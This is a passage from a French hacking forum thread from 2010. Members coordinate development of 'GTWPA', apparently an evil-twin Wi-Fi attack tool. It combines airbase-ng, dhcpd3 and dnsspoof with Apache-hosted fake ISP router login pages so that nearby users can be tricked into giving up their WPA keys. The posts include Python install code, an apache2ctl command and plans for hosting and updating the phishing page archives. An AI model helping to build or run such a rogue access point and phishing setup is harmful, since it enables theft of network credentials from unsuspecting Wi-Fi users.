	os.system("cp /opt/GTWPA/server/backup/numericable.tar.gz /opt/GTWPA/server/rogue/")
	chdir("/opt/GTWPA/server/rogue/")
	os.system("tar -xvzf numericable.tar.gz")
	os.system("chmod -R 777 /opt/GTWPA/server/rogue")
	os.system("cd /opt/GTWPA/")
	print "Installation du programme : ACHEVeE"
	chdir("/opt/GTWPA/")

Dans ce style ?


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#45 10-10-2010 00:06:51

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : [PRO]GTWPA (Developpers)

Si j'adapte mon script pour que :

- Dans /opt/GTWPA/server/backup : soient téléchargé pendant l'installation tous les fichiers des boxes
- Dans /opt/GTWPA/server/rogue : soient décompressés et chmod tous les fichiers de l'archive choisie
- Dans /opt/gtwpa/logs : les différents logs dhcpd3, airbase-ng etc...
- Dans /opt/GTWPA/conf : les différents fichiers utilisés par dnsspoof & autres

ça sera bon ou c'est pas encore ça ?

Sachant que je comprends pas trop pourquoi notre script peut pas écrire directement dans /opt/GTWPA/conf/ les fichiers dhcpd.conf et dns.txt ? C'est plus simple si l'utilisateur n'a pas à les télécharger et si le script les créées automatiquement.

Le script peut ainsi être appelé de n'importe ou, de n'importe quel backtrack en live-cd, il s'occupe de tout et est fonctionnel.

Je peux donc facilement adapter mon script de la sorte, le seul point sur lequel je vais "bugguer" va être celui des configurations apache2. Tant que c'était dans /var/www/ c'était simple mais là faut tout rediriger vers /opt/GTWPA/rogue.

Une fois que j'aurais compris comment faire ça, je pense qu'on sera bon non ?


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#46 10-10-2010 08:55:16

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

Carto_ a écrit :

Si j'adapte mon script pour que :

- Dans /opt/GTWPA/server/backup : soient téléchargé pendant l'installation tous les fichiers des boxes
- Dans /opt/GTWPA/server/rogue : soient décompressés et chmod tous les fichiers de l'archive choisie
- Dans /opt/gtwpa/logs : les différents logs dhcpd3, airbase-ng etc...
- Dans /opt/GTWPA/conf : les différents fichiers utilisés par dnsspoof & autres

ça sera bon ou c'est pas encore ça ?

Oui ce sera nickel wink

Carto_ a écrit :

Sachant que je comprends pas trop pourquoi notre script peut pas écrire directement dans /opt/GTWPA/conf/ les fichiers dhcpd.conf et dns.txt ? C'est plus simple si l'utilisateur n'a pas à les télécharger et si le script les créées automatiquement.

En faites j'avais dans l'idée de faire un packet .deb après donc l'installation ne serais pas nécessaire inclus dans le script mais par contre il faudrait que celui-ci update les fakes pages (à partir de je ne sais ou d'ailleurs)

Carto_ a écrit :

Le script peut ainsi être appelé de n'importe ou, de n'importe quel backtrack en live-cd, il s'occupe de tout et est fonctionnel.

On fera un lien symbolique (ln) pour pouvoir l'appeler de n'importe ou wink

Carto_ a écrit :

Je peux donc facilement adapter mon script de la sorte, le seul point sur lequel je vais "bugguer" va être celui des configurations apache2. Tant que c'était dans /var/www/ c'était simple mais là faut tout rediriger vers /opt/GTWPA/rogue.

En fait c'est tout con ... Pour demarrer apache il faut utiliser cette commande

apache2ctl -k start -f /opt/GTWPA/conf/apache2/apache2.conf

et ensuite suffit simplement de mettre tous les les fake pages dans /opt/GTWPA/server/rogue

Si t'as d'autre question, n'hésite pas wink


Sharkoff

Hors Ligne

#47 10-10-2010 10:13:20

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : [PRO]GTWPA (Developpers)

Alors pour le chan IRC, je viens de le créer sur Tinychat car M1ck3y n'a pas le temps de s'occuper d'un serveur IRC en plus, il est déjà débordé par le site.

Pour updater les fakes pages, il faudrait avoir un serveur ou alors les mettre sur megaupload ou autre mais je ne sais pas si c'est possible.

@Squaks : il faudrait que tu modifie les liens pour télécharger les fakes panel, que tu changes crack-wpa.fr par crack-wifi.com

Hors Ligne

#48 10-10-2010 11:15:28

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : [PRO]GTWPA (Developpers)

J'ai une bonne nouvelle à vous annoncer : je viens de trouver un serveur gratuit chez Tonbnc. J'y avais un VPS avant et c'est parfait, je n'ai eu aucun soucis.

Il ne me reste plus qu'à mettre en place IRC en place dessus.

Hors Ligne

#49 10-10-2010 12:48:57

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : [PRO]GTWPA (Developpers)

Quelqu'un s'y connaitrait pour mettre en place un serveur IRC ? car j'arrive pas à comprendre comment le mettre en place

Dernière modification par Dack (10-10-2010 13:07:55)

Hors Ligne

#50 10-10-2010 13:24:34

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : [PRO]GTWPA (Developpers)

Pour le serveur IRC j'avouerai n'y connaître que dalle donc je ne vais pas pouvoir t'aider, désolé :-s

-- @Squaks :

- J'édite donc mon script pour que tout se trouve dans les répertoires visés.
- Pour l'installation donc je la laisse pour le moment mais on pourra la virer si on en fait un packet .deb.
- Pour le lien "symbolique", je ne sais pas du tout de quoi il s'agit, si tu peux m'expliquer ça en quelques lignes ce sera super
- Pour le fichier de configuration apache2, pas de problèmes, j'ai compris le business je l'inclus aussi dans le script
- Pour le repo sur lequel seront les archives des pages, il faudrait qu'on trouve un truc fiable, et qu'on les laisse là, les uploadant quand nécessaire.

Je reposte quand j'aurais eu le temps d'apporter toutes ces modifications.


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Épinglée :
203 62865 07-10-2012 14:39:37 par 39max
Je recherche GTWPA par Linquant
4 2112 14-04-2011 12:25:15 par Linquant
0 6168 08-12-2010 22:50:28 par M1ck3y
GTWPA par sardineeMule
4 2210 27-12-2008 16:46:11 par sardineeMule

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.037 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]